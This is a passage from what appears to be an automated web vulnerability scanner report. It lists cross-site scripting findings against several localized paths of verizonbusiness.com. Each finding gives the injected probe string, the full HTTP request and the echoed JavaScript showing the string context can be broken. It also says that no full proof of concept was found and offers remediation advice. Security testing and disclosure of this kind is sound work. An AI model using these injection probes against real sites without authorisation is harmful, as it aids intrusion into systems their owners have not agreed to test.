User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:58:54 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 48637
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:58:54 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:58:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/jp17cec';bf9b3c29f39/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.523. http://www.verizonbusiness.com/kr/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /kr/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87230"%3b8e18eede772 was submitted in the REST URL parameter 1. This input was echoed as 87230";8e18eede772 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /kr87230"%3b8e18eede772/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:57:14 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40613
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:57:14 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:57:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/kr87230";8e18eede772/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.524. http://www.verizonbusiness.com/kr/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /kr/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1b4e'%3b9b709c792ca was submitted in the REST URL parameter 1. This input was echoed as a1b4e';9b709c792ca in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /kra1b4e'%3b9b709c792ca/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:57:40 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40615
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:57:40 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:57:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/kra1b4e';9b709c792ca/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.525. http://www.verizonbusiness.com/mx/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /mx/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92500"%3bc06ef5deb5 was submitted in the REST URL parameter 1. This input was echoed as 92500";c06ef5deb5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mx92500"%3bc06ef5deb5/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:58:37 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47571
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:58:38 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:58:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Esta p..gina no existe";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/mx92500";c06ef5deb5/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.526. http://www.verizonbusiness.com/mx/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /mx/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2020'%3b5fd3757eccf was submitted in the REST URL parameter 1. This input was echoed as c2020';5fd3757eccf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mxc2020'%3b5fd3757eccf/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:59:29 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47571
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:59:29 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:59:29 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/mxc2020';5fd3757eccf/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.527. http://www.verizonbusiness.com/nl/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /nl/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fecdf"%3b586cafd539e was submitted in the REST URL parameter 1. This input was echoed as fecdf";586cafd539e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nlfecdf"%3b586cafd539e/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:57:23 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40615
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:57:24 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:57:23 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/nlfecdf";586cafd539e/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.528. http://www.verizonbusiness.com/nl/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /nl/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a068'%3b2845184fe90 was submitted in the REST URL parameter 1. This input was echoed as 8a068';2845184fe90 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nl8a068'%3b2845184fe90/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:57:43 GMT
Content-Type: text/html
Content-Length: 40615
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:57:43 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:57:43 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/nl8a068';2845184fe90/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.529. http://www.verizonbusiness.com/nl/solutions/var/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /nl/solutions/var/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27331"%3b277730a9280 was submitted in the REST URL parameter 1. This input was echoed as 27331";277730a9280 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nl27331"%3b277730a9280/solutions/var/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:57:23 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40641
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:57:24 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:57:23 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/nl27331";277730a9280/solutions/var/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.530. http://www.verizonbusiness.com/nl/solutions/var/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /nl/solutions/var/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a50d4'%3b8d8d7fd253 was submitted in the REST URL parameter 1. This input was echoed as a50d4';8d8d7fd253 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nla50d4'%3b8d8d7fd253/solutions/var/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:57:47 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40639
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:57:47 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:57:47 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/nla50d4';8d8d7fd253/solutions/var/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.531. http://www.verizonbusiness.com/nl/solutions/var/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /nl/solutions/var/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32102"%3b762bae8912b was submitted in the REST URL parameter 2. This input was echoed as 32102";762bae8912b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nl/solutions32102"%3b762bae8912b/var/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:58:04 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41160
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:58:04 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:58:04 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/nl/solutions32102";762bae8912b/var/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT
...[SNIP]...

1.532. http://www.verizonbusiness.com/nl/solutions/var/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /nl/solutions/var/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6caa'%3bcf4fdcd51 was submitted in the REST URL parameter 2. This input was echoed as d6caa';cf4fdcd51 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nl/solutionsd6caa'%3bcf4fdcd51/var/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:58:32 GMT
Content-Type: text/html
Content-Length: 41156
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:58:33 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:58:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/nl/solutionsd6caa';cf4fdcd51/var/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.533. http://www.verizonbusiness.com/nl/solutions/var/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /nl/solutions/var/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18bcc'%3bf429cc4a32d was submitted in the REST URL parameter 3. This input was echoed as 18bcc';f429cc4a32d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nl/solutions/var18bcc'%3bf429cc4a32d/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:59:26 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42372
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:59:27 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:59:26 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/nl/solutions/var18bcc';f429cc4a32d/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.534. http://www.verizonbusiness.com/nl/solutions/var/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /nl/solutions/var/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa719"%3b8d39f9bd01d was submitted in the REST URL parameter 3. This input was echoed as fa719";8d39f9bd01d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nl/solutions/varfa719"%3b8d39f9bd01d/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:58:51 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42372
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:58:51 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:58:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/nl/solutions/varfa719";8d39f9bd01d/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.535. http://www.verizonbusiness.com/no/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /no/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2ab8"%3bba895b94910 was submitted in the REST URL parameter 1. This input was echoed as f2ab8";ba895b94910 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nof2ab8"%3bba895b94910/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
